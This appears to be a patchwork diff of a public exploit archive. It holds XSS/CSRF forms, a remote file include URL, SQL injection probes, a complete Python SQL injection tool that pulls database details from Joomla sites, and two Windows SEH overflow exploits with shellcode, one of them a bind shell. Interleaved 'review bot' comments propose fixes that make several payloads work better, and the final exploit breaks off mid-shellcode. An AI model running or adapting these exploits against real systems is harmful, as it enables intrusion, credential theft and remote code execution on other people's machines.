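+<form action="http://www.example.com/index.php" method="post" name="main" >
+<input type="hidden" name="sendtags" value="cms" />
+<input type="hidden" name="sendid" value="newtag" />
+<input type="hidden" name="sendname" value=&#039;New tag"><script>alert(document.cookie)</script>&#039; />
+<input type="hidden" name="event" value="add_tag" />
+</form>
+<script>
+document.main.submit();
+</script>
+<form action="http://www.example.com/index.php" method="post" name="main" >
+<input type="hidden" name="sendid" value="rumba_id" />
+<input type="hidden" name="sendtitl" value="rumba_titl" />
+<input type="hidden" name="sendauthor" value="rumba_author" />
+<input type="hidden" name="senddata" value="Sat, 14 Aug 2010 14:34:20" />
+<input type="hidden" name="sendlost" value="0" />
+<input type="hidden" name="senddesc" value=&#039;rumba_desc"><script>alert(document.cookie)</script>&#039; />
+<input type="hidden" name="sendanons" value="rumba_anons" />
+<input type="hidden" name="sendtext" value="rumba_text" />
+<input type="hidden" name="sendtags" value="service" />
+<input type="hidden" name="sendcomm" value="yes" />
+<input type="hidden" name="add-end" value="begin" />
+<input type="hidden" name="send_old_id" value="rumba_old_id" />
+<input type="hidden" name="event" value="add_page" />
+</form>
+<script>
+document.main.submit();
+</script>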
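Review bot: The two payload inputs are broken HTML: `value=&#039;New tag"><script>...` and `value=&#039;rumba_desc"><script>...` use the entity `&#039;` where a literal quote delimiter is required, so the browser parses an unquoted attribute that ends at the first space and the `<script>` runs in the attacker's own page instead of being posted to the target. They should read `value='New tag"><script>alert(document.cookie)</script>'` and `value='rumba_desc"><script>alert(document.cookie)</script>'`, as the sibling Amiro.CMS PoC in this commit does. As with that PoC, both forms share `name="main"` and a `document.main.submit();` call, which fails if they are placed on a single page; the file should say they are separate pages or rename the second form. Whether `add_tag` and `add_page` require an authenticated session is not stated and determines whether this is CSRF-dependent.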


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42923/info
ArtGK CMS is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
<form action="http://host/cms/action?async=exit" method="post" name="main" > <input type="hidden" name="_a[0][action]" value="saveAndPublish" /> <input type="hidden" name="_a[0][id]" value="1" /> <input type="hidden" name="_a[0][vars][title]" value="page title" /> <input type="hidden" name="_a[0][vars][description]" value="description" /> <input type="hidden" name="_a[0][vars][keywords]" value="metakeys" /> <input type="hidden" name="_a[0][vars][link]" value="/" /> <input type="hidden" name="_a[0][vars][use_content_in_head]" value="path" /> <input type="hidden" name="_a[0][vars][head]" value='<script type="text/javascript" src="/cms/js/ajax.js"> </script><meta name="keywords" content="keywords"/><meta name="description" content="Description"/><script>alert(document.cookie)</script><title>Site Title</title>' /> </form> <script> document.main.submit(); </script>
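Review bot: The whole PoC has been collapsed onto one line, which makes the 40-odd attribute fields unreadable; it should be restored to one element per line like the other CSRF PoCs in this commit. The injected value goes into `_a[0][vars][head]`, a field that by its name and the `<script src="/cms/js/ajax.js">` and `<meta>` content the PoC itself supplies appears to accept raw page-head HTML by design, so the finding seems to be that an authenticated `saveAndPublish` request is not CSRF-protected rather than that the field is unescaped; the description should say which of the two it is and that the victim must hold a CMS session. The `alert(document.cookie)` marker is a reasonable test, but the expected observation (script executes on the published page at `/`) should be spelled out.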


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42924/info
KingCMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
KingCMS 0.6.0 is vulnerable; other versions may be affected.
http://www.example.com/[path]/include/engine/content/elements/block.php? CONFIG[AdminPath] =[SHELL]
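Review bot: The PoC URL contains spaces around the parameter (`block.php? CONFIG[AdminPath] =[SHELL]`), which would be sent as `%20` and not match the `CONFIG[AdminPath]` key; it should be `block.php?CONFIG[AdminPath]=[SHELL]`. Overriding a `CONFIG[...]` array element from the query string presumably depends on `register_globals` being enabled, and loading `[SHELL]` from a remote URL depends on `allow_url_include`; both prerequisites are worth stating since they are off by default on most PHP deployments of the period and decide whether the issue is a remote or merely a local file include. `[SHELL]` should be described as a URL to a remote PHP file, and the expected output on success given.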


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42930/info
AdaptBB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AdaptBB 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?do=search&q=PUUUUKE%22%27%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&x=0&y=0


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42949/info
OneCMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
OneCMS version 2.6.1 is vulnerable; others may also be affected.
http://www.example.com/index.php?load=elite&view=1%3C/title%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/42951/info
CMS WebManager-Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/c.php?id=1%20and%20version()=5
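Review bot: The PoC `c.php?id=1 and version()=5` is a boolean-based blind test but the file never says what a positive result looks like, and the condition itself is version-dependent: MySQL coerces the string returned by `version()` to a number using its leading numeric prefix, so `version()=5` is likely false on a 5.1.x server, which a tester could misread as "not vulnerable". A version-independent pair, `c.php?id=1 and 1=1` versus `c.php?id=1 and 1=2`, with a note that the page content differs between the two when the parameter is injectable, would make the check reliable. The affected version of CMS WebManager-Pro is also not stated in the file body.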


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42959/info
NuSOAP is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
NuSOAP 0.9.5 is vulnerable; other versions may be affected.
http://www.example.com/filename.php/1%3CScRiPt%3Eprompt(923395)%3C/ScRiPt%3E"
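Review bot: The PoC URL ends with a stray `"` that is not part of the payload and `filename.php` is an unexplained placeholder; the line should read `http://www.example.com/[nusoap_endpoint].php/1%3CScRiPt%3Eprompt(923395)%3C/ScRiPt%3E` with a sentence saying it must be a script that instantiates `nusoap_server`. The vector is the PATH_INFO suffix after the script name, which presumably NuSOAP reflects when it builds the endpoint or WSDL URL; naming the reflecting component, and whether a request with a `?wsdl` query is needed, would let readers check a given deployment. Mixed-case `ScRiPt` implies a filter bypass that is not described; if no filter exists, plain `<script>` is clearer.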

platforms/php/webapps/34571.py Executable file

@ -0,0 +1,308 @@
#!/usr/bin/env python
#
#
# Exploit Title : Joomla Spider Calendar <= 3.2.6 SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://web-dorado.com/
#
# Software Link : http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329
#
# Dork Google: inurl:option=com_spidercalendar
#
# Date : 2014-08-31
#
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
#
#
#
######################
#
# PoC Exploit:
#
# http://localhost/joomla/index.php?option=com_spidercalendar&calendar_id=1 [SQLi]
#
#
# "calendar_id" and "calendar" variables are not sanitized.
#
#
# Vulnerability Disclosure Timeline:
#
# 2014-08-31: Discovered vulnerability
# 2014-09-04: Vendor Notification
# 2014-09-05: Vendor Response/Feedback
# 2014-09-05: Vendor Fix/Patch
# 2014-09-05: Public Disclosure
import codecs
import httplib
import re
import sys
import socket
import optparse
banner = """
$$$$$\ $$\ $$$$$$\ $$\ $$\
\__$$ | $$ | $$ __$$\ \__| $$ |
$$ | $$$$$$\ $$$$$$\ $$$$$$\$$$$\ $$ | $$$$$$\ $$ / \__| $$$$$$\ $$\ $$$$$$$ | $$$$$$\ $$$$$$\
$$ |$$ __$$\ $$ __$$\ $$ _$$ _$$\ $$ | \____$$\ \$$$$$$\ $$ __$$\ $$ |$$ __$$ |$$ __$$\ $$ __$$\
$$\ $$ |$$ / $$ |$$ / $$ |$$ / $$ / $$ |$$ | $$$$$$$ | \____$$\ $$ / $$ |$$ |$$ / $$ |$$$$$$$$ |$$ | \__|
$$ | $$ |$$ | $$ |$$ | $$ |$$ | $$ | $$ |$$ |$$ __$$ | $$\ $$ |$$ | $$ |$$ |$$ | $$ |$$ ____|$$ |
\$$$$$$ |\$$$$$$ |\$$$$$$ |$$ | $$ | $$ |$$ |\$$$$$$$ | \$$$$$$ |$$$$$$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$ |
\______/ \______/ \______/ \__| \__| \__|\__| \_______| \______/ $$ ____/ \__| \_______| \_______|\__|
$$ |
$$ |
\__|
$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$\
$$ __$$\ $$ | $$ | $$ ___$$\ $$ __$$\ $$ __$$\
$$ / \__| $$$$$$\ $$ | $$$$$$\ $$$$$$$\ $$$$$$$ | $$$$$$\ $$$$$$\ \_/ $$ | \__/ $$ | $$ / \__|
$$ | \____$$\ $$ |$$ __$$\ $$ __$$\ $$ __$$ | \____$$\ $$ __$$\ $$$$$ / $$$$$$ | $$$$$$$\
$$ | $$$$$$$ |$$ |$$$$$$$$ |$$ | $$ |$$ / $$ | $$$$$$$ |$$ | \__| \___$$\ $$ ____/ $$ __$$\
$$ | $$\ $$ __$$ |$$ |$$ ____|$$ | $$ |$$ | $$ |$$ __$$ |$$ | $$\ $$ | $$ | $$ / $$ |
\$$$$$$ |\$$$$$$$ |$$ |\$$$$$$$\ $$ | $$ |\$$$$$$$ |\$$$$$$$ |$$ | \$$$$$$ |$$\ $$$$$$$$\ $$\ $$$$$$ |
\______/ \_______|\__| \_______|\__| \__| \_______| \_______|\__| \______/ \__|\________|\__|\______/
j00ml4 Spid3r C4l3nd4r >= 2.x <= 3.2.6 SQLi
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
C0mm4nds = dict()
C0mm4nds['DB VERS'] = 'VERSION'
C0mm4nds['DB NAME'] = 'DATABASE'
C0mm4nds['DB USER'] = 'CURRENT_USER'
com_spidercalendar = "index.php?option=com_spidercalendar&calendar_id=1"
ver_spidercalendar = "administrator/components/com_spidercalendar/spidercalendar.xml"
vuln = 0
def cmdMySQL(cmd):
SqlInjList = [
# SQLi Spider Calendar 2.x
'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Calendar 3.0
'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
# SQLi Spider Calendar 3.2.x
'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28'+cmd+'%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23',
]
return SqlInjList
def checkProtocol(pr):
parsedHost = ""
PORT = m_oOptions.port
if pr[0:8] == "https://":
parsedHost = pr[8:]
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 443
PROTO = httplib.HTTPSConnection(parsedHost, PORT)
elif pr[0:7] == "http://":
parsedHost = pr[7:]
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 80
PROTO = httplib.HTTPConnection(parsedHost, PORT)
else:
parsedHost = pr
if parsedHost.endswith("/"):
parsedHost = parsedHost.replace("/","")
if PORT == 0:
PORT = 80
PROTO = httplib.HTTPConnection(parsedHost, PORT)
return PROTO, parsedHost
def connection(addr, url_string):
parsedHost = checkProtocol(addr)[1]
PROTO = checkProtocol(addr)[0]
try:
socket.gethostbyname(parsedHost)
except socket.gaierror:
print 'Hostname could not be resolved. Exiting'
sys.exit()
connection_req = checkProtocol(addr)[0]
try:
connection_req.request('GET', url_string)
except socket.error:
print('Connection Error')
sys.exit(1)
response = connection_req.getresponse()
reader = codecs.getreader("utf-8")(response)
return {'response':response, 'reader':reader}
if __name__ == '__main__':
m_oOpts = optparse.OptionParser("%prog -H http[s]://Host_or_IP [-b, --base base_dir] [-p, --port PORT]")
m_oOpts.add_option('--host', '-H', action='store', type='string',
help='The address of the host running Spider Calendar extension(required)')
m_oOpts.add_option('--base', '-b', action='store', type='string', default="/",
help='base dir joomla installation, default "/")')
m_oOpts.add_option('--port', '-p', action='store', type='int', default=0,
help='The port on which the daemon is running (default 80)')
m_oOptions, remainder = m_oOpts.parse_args()
m_nHost = m_oOptions.host
m_nPort = m_oOptions.port
m_nBase = m_oOptions.base
if not m_nHost:
print(banner)
print m_oOpts.format_help()
sys.exit(1)
print(banner)
if m_nBase != "/":
if m_nBase[0] == "/":
m_nBase = m_nBase[1:]
if m_nBase[-1] == "/":
m_nBase = m_nBase[:-1]
else:
if m_nBase[-1] == "/":
m_nBase = m_nBase[:-1]
m_nBase = '/'+m_nBase+'/'
# Start connection to host for Joomla Spider Calendar vulnerability
response = connection(m_nHost, m_nBase+com_spidercalendar+'%27').values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+'%27').values()[1]
# Read connection code number
getcode = response.status
print("[+] Searching for Joomla Spider Calendar vulnerability...")
print("[+]")
if getcode != 404:
for lines in reader:
if not lines.find("You have an error in your SQL syntax;") == -1:
print("[!] Boolean SQL injection vulnerability FOUND!")
print("[+]")
print("[+] Detection version in progress....")
print("[+]")
try:
response = connection(m_nHost, m_nBase+ver_spidercalendar).values()[0]
reader = connection(m_nHost, m_nBase+ver_spidercalendar).values()[1]
getcode = response.status
if getcode != 404:
for line_version in reader:
if not line_version.find("<version>") == -1:
VER = re.compile('>(.*?)<').search(line_version).group(1)
VER_REP = VER.replace(".","")
if int(VER_REP[0]) == 1 or int(VER_REP) > 326:
print("[X] VERSION: "+VER)
print("[X] Joomla Spider Calendar <= 1 or >= 3.2.7 are not vulnerable")
sys.exit(1)
elif int(VER_REP[0]) == 2:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[0]).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[0]).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP) == 30:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[1]).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[1]).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
elif int(VER_REP[0]) == 3:
print("[+] EXTENSION VERSION: "+VER)
print("[+]")
for cmddesc, cmdsqli in C0mm4nds.items():
try:
response = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[2]).values()[0]
reader = connection(m_nHost, m_nBase+com_spidercalendar+cmdMySQL(cmdsqli)[2]).values()[1]
getcode = response.status
if getcode != 404:
for line_response in reader:
if not line_response.find("h0m3l4b1t") == -1:
MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
if vuln == 0:
print("[!] "+m_nHost+" VULNERABLE!!!")
print("[+]")
print("[!] "+cmddesc+" : "+MYSQL_VER)
vuln = 1
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
else:
print("[-] EXTENSION VERSION: Unknown :(")
sys.exit(0)
if vuln == 0:
# VERSION NOT VULNERABLE :(
print("[X] Spider Calendar patched or SQLi blocked by Web Application Firewall-")
sys.exit(1)
else:
sys.exit(0)
except socket.error:
print('[X] Connection was lost please retry')
sys.exit(1)
# NO SQL BLIND DETECTED
print("[X] Spider Calendar patched or SQLi blocked by Web Application Firewall")
sys.exit(1)
else:
print('[X] URL "'+m_nHost+m_nBase+com_spidercalendar+'" NOT FOUND')
sys.exit(1)
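Review bot: The callers of `connection()` unpack its result with `.values()[0]` and `.values()[1]` (first at the `'%27'` probe, then at the version lookup and the three version-specific probes), but a Python 2 dict has no guaranteed value order, so `response` and `reader` can come back swapped; index by key instead, `result = connection(m_nHost, m_nBase+com_spidercalendar+'%27')` followed by `response, reader = result['response'], result['reader']`. Each of those pairs also calls `connection()` twice, so every probe is issued twice over the network, and `connection()` itself calls `checkProtocol(addr)` three times, building a connection object on the second call that it never uses. `checkProtocol` reads `m_oOptions.port` from module scope, which only exists when the script runs as `__main__`; passing the port in as a parameter would remove that hidden dependency. The `banner`, `C0mm4nds` and `cmdMySQL` definitions carry no docstring or comment describing the marker strings (`h0m3l4b1t` / `t1b4l3m0h`) the response parser searches for, which a reader needs to follow the detection logic.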

23
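--- a/platforms/php/webapps/34572.txt
+++ b/platforms/php/webapps/34572.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
+# Google Dork: N/A
+# Date: 05.09.2014
+# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
+# Vendor Homepage - http://www.speakdigital.co.uk/
+# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
+# Version: 1.0
+# Tested on: PHP
+Description:
+This plugin will allow administrator to delete user(s) account by entering
+their email address.
+Proof of Concept
+1. Force the administrator to send below request:
+URL :
+http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
+METHOD : POST
+REQUEST : de-text=<victim email>&submit=Search+and+Delete
+* As the result, user with the given email address will be deleted.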


@ -0,0 +1,76 @@
import subprocess
# Exploit Title: HTML Help Workshop 1.4 - Local Buffer Overflow Exploit (SEH)
# Date: 31/08/2014
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx
# Version: 1.4
# Tested on: Windows XP SP3 / Windows 7 Pro
junk = "A" * 832 # Junk bytes
nseh = "\xeb\x06\xff\xff" # Overwrite next seh, with jump forward (over the next 6 bytes) instruction
seh = "\xd0\x11\x30\x45" # Overwrite seh with POP ECX,POP ESI,RETN from HHA.dll (Universal)
nops = "\x90" * 10 # Nops
#msfpayload windows/shell_bind_tcp EXITFUNC=seh R |
#msfencode -e x86/alpha_mixed -c 1 -b '\x00\x0a\x0d\xff'
shellcode = ("\x89\xe5\xd9\xc4\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32"
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
"\x42\x75\x4a\x49\x6b\x4c\x79\x78\x4f\x79\x65\x50\x57\x70"
"\x67\x70\x75\x30\x4c\x49\x58\x65\x30\x31\x69\x42\x30\x64"
"\x6c\x4b\x31\x42\x66\x50\x4e\x6b\x46\x32\x66\x6c\x6e\x6b"
"\x66\x32\x44\x54\x4c\x4b\x50\x72\x44\x68\x64\x4f\x68\x37"
"\x50\x4a\x65\x76\x65\x61\x4b\x4f\x46\x51\x4f\x30\x4e\x4c"
"\x55\x6c\x65\x31\x31\x6c\x36\x62\x44\x6c\x55\x70\x6b\x71"
"\x48\x4f\x44\x4d\x55\x51\x79\x57\x39\x72\x68\x70\x33\x62"
"\x66\x37\x6e\x6b\x42\x72\x36\x70\x6e\x6b\x42\x62\x45\x6c"
"\x56\x61\x68\x50\x6c\x4b\x61\x50\x61\x68\x6c\x45\x4f\x30"
"\x31\x64\x72\x6a\x75\x51\x78\x50\x42\x70\x6e\x6b\x30\x48"
"\x42\x38\x4e\x6b\x73\x68\x61\x30\x76\x61\x6e\x33\x69\x73"
"\x47\x4c\x72\x69\x6e\x6b\x77\x44\x4c\x4b\x65\x51\x79\x46"
"\x34\x71\x79\x6f\x50\x31\x4f\x30\x6c\x6c\x7a\x61\x38\x4f"
"\x54\x4d\x57\x71\x68\x47\x77\x48\x79\x70\x54\x35\x7a\x54"
"\x67\x73\x61\x6d\x79\x68\x65\x6b\x61\x6d\x36\x44\x61\x65"
"\x78\x62\x36\x38\x6e\x6b\x42\x78\x64\x64\x53\x31\x49\x43"
"\x63\x56\x4e\x6b\x66\x6c\x52\x6b\x4c\x4b\x53\x68\x35\x4c"
"\x55\x51\x59\x43\x6c\x4b\x43\x34\x6c\x4b\x57\x71\x38\x50"
"\x4c\x49\x72\x64\x77\x54\x51\x34\x53\x6b\x53\x6b\x50\x61"
"\x63\x69\x32\x7a\x42\x71\x59\x6f\x6b\x50\x36\x38\x71\x4f"
"\x71\x4a\x4e\x6b\x75\x42\x48\x6b\x4e\x66\x51\x4d\x43\x58"
"\x56\x53\x56\x52\x55\x50\x75\x50\x43\x58\x52\x57\x73\x43"
"\x45\x62\x61\x4f\x31\x44\x31\x78\x62\x6c\x43\x47\x66\x46"
"\x34\x47\x49\x6f\x5a\x75\x6c\x78\x6a\x30\x46\x61\x37\x70"
"\x63\x30\x34\x69\x4f\x34\x51\x44\x62\x70\x63\x58\x67\x59"
"\x4d\x50\x52\x4b\x43\x30\x39\x6f\x68\x55\x36\x30\x56\x30"
"\x46\x30\x66\x30\x73\x70\x72\x70\x71\x50\x52\x70\x70\x68"
"\x78\x6a\x44\x4f\x49\x4f\x4d\x30\x49\x6f\x49\x45\x6c\x49"
"\x79\x57\x66\x51\x39\x4b\x51\x43\x70\x68\x76\x62\x47\x70"
"\x66\x71\x33\x6c\x6d\x59\x79\x76\x43\x5a\x72\x30\x66\x36"
"\x36\x37\x52\x48\x69\x52\x4b\x6b\x65\x67\x72\x47\x59\x6f"
"\x69\x45\x76\x33\x31\x47\x62\x48\x6d\x67\x39\x79\x45\x68"
"\x79\x6f\x39\x6f\x4a\x75\x32\x73\x42\x73\x30\x57\x73\x58"
"\x44\x34\x4a\x4c\x55\x6b\x68\x61\x39\x6f\x69\x45\x70\x57"
"\x6b\x39\x4a\x67\x32\x48\x63\x45\x50\x6e\x62\x6d\x65\x31"
"\x39\x6f\x6e\x35\x73\x58\x72\x43\x42\x4d\x30\x64\x43\x30"
"\x6e\x69\x5a\x43\x56\x37\x73\x67\x43\x67\x66\x51\x7a\x56"
"\x33\x5a\x52\x32\x71\x49\x33\x66\x48\x62\x4b\x4d\x73\x56"
"\x59\x57\x72\x64\x66\x44\x47\x4c\x66\x61\x57\x71\x4e\x6d"
"\x67\x34\x31\x34\x46\x70\x79\x56\x75\x50\x57\x34\x70\x54"
"\x62\x70\x36\x36\x32\x76\x42\x76\x57\x36\x76\x36\x42\x6e"
"\x63\x66\x33\x66\x73\x63\x30\x56\x32\x48\x50\x79\x78\x4c"
"\x37\x4f\x4f\x76\x39\x6f\x4e\x35\x6c\x49\x79\x70\x50\x4e"
"\x52\x76\x61\x56\x39\x6f\x50\x30\x61\x78\x36\x68\x6d\x57"
"\x67\x6d\x53\x50\x79\x6f\x38\x55\x6d\x6b\x4b\x4e\x66\x6e"
"\x45\x62\x79\x7a\x33\x58\x59\x36\x4e\x75\x4f\x4d\x4d\x4d"
"\x39\x6f\x59\x45\x55\x6c\x56\x66\x33\x4c\x66\x6a\x6f\x70"
"\x79\x6b\x39\x70\x71\x65\x54\x45\x6d\x6b\x53\x77\x37\x63"
"\x73\x42\x42\x4f\x73\x5a\x77\x70\x70\x53\x79\x6f\x49\x45"
"\x41\x41")
exploit = junk + nseh + seh + nops + shellcode
subprocess.call(['C:\\Program Files\\HTML Help Workshop\\hhw.exe ',exploit])
# EOF
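Review bot: The `import subprocess` line sits above the file's header comment block (title, date, author, tested-on); that header conventionally opens the file, so the import belongs below it. The executable path handed to `subprocess.call` ends with a space inside the string literal (`hhw.exe '`), which reads as a typo rather than part of the path and should be confirmed. The `seh` comment describes the address as `from HHA.dll (Universal)` without saying which build(s) that claim was checked against; a comment such as `# verified on HHA.dll shipped with <tested builds>` next to the "Tested on" line would make the note reviewable.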


@ -0,0 +1,69 @@
# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
# Google Dork: "k3170makan is totally awesome" hehehe
# Date: 2014-08-28
# Exploit Author: k3170makan
# Vendor Homepage: http://www.leapware.com/
# Software Link: http://www.leapware.com/download.html
# Version: 3.1.0
# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)
# Timeline:
# * 2014-08-28 : Initial contact
# * 2014-09-01 : no contact
# * 2014-09-01 : public disclosure
"""
This vulnerability was disclosed according to the terms of my public
disclosure policy (
http://blog.k3170makan.com/p/public-disclosure-policy.html)
"""
from sys import argv
if __name__ == "__main__":
ovTrigger = 1093
f = open("exploit.txt","w")
f.write("ftp://")
f.write("A"*ovTrigger)
f.write("\xEB\x06\x90\x90") #JMP to payload
f.write("\x44\xD3\x4A\x77") #POP POP RET
f.write("\x90"*30)
#msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1
-b \x00\x0a\x0d\xff
shellcode = "\x89\xe0\xd9\xe8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49" +\
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +\
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +\
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +\
"\x42\x75\x4a\x49\x49\x6c\x68\x68\x4f\x79\x35\x50\x53\x30" +\
"\x45\x50\x35\x30\x6e\x69\x79\x75\x30\x31\x6a\x72\x30\x64" +\
"\x4c\x4b\x53\x62\x56\x50\x4e\x6b\x76\x32\x56\x6c\x6c\x4b" +\
"\x42\x72\x62\x34\x6e\x6b\x54\x32\x46\x48\x76\x6f\x6e\x57" +\
"\x61\x5a\x67\x56\x45\x61\x39\x6f\x64\x71\x4b\x70\x4e\x4c" +\
"\x55\x6c\x53\x51\x33\x4c\x67\x72\x76\x4c\x51\x30\x59\x51" +\
"\x38\x4f\x64\x4d\x45\x51\x49\x57\x4d\x32\x58\x70\x56\x32" +\
"\x70\x57\x4e\x6b\x31\x42\x76\x70\x4e\x6b\x61\x52\x47\x4c" +\
"\x73\x31\x5a\x70\x4c\x4b\x57\x30\x53\x48\x6c\x45\x4f\x30" +\
"\x33\x44\x51\x5a\x65\x51\x48\x50\x42\x70\x6e\x6b\x72\x68" +\
"\x67\x68\x6c\x4b\x30\x58\x47\x50\x77\x71\x5a\x73\x49\x73" +\
"\x77\x4c\x71\x59\x6e\x6b\x35\x64\x4e\x6b\x57\x71\x4b\x66" +\
"\x35\x61\x4b\x4f\x34\x71\x4f\x30\x4e\x4c\x59\x51\x4a\x6f" +\
"\x74\x4d\x75\x51\x58\x47\x44\x78\x59\x70\x62\x55\x68\x74" +\
"\x33\x33\x61\x6d\x4b\x48\x65\x6b\x33\x4d\x47\x54\x72\x55" +\
"\x58\x62\x36\x38\x6e\x6b\x32\x78\x35\x74\x55\x51\x4a\x73" +\
"\x73\x56\x4e\x6b\x66\x6c\x72\x6b\x6e\x6b\x71\x48\x77\x6c" +\
"\x47\x71\x78\x53\x6e\x6b\x73\x34\x4e\x6b\x75\x51\x5a\x70" +\
"\x4b\x39\x77\x34\x35\x74\x71\x34\x31\x4b\x51\x4b\x75\x31" +\
"\x71\x49\x70\x5a\x66\x31\x4b\x4f\x39\x70\x43\x68\x43\x6f" +\
"\x53\x6a\x4c\x4b\x42\x32\x38\x6b\x4b\x36\x53\x6d\x42\x4a" +\
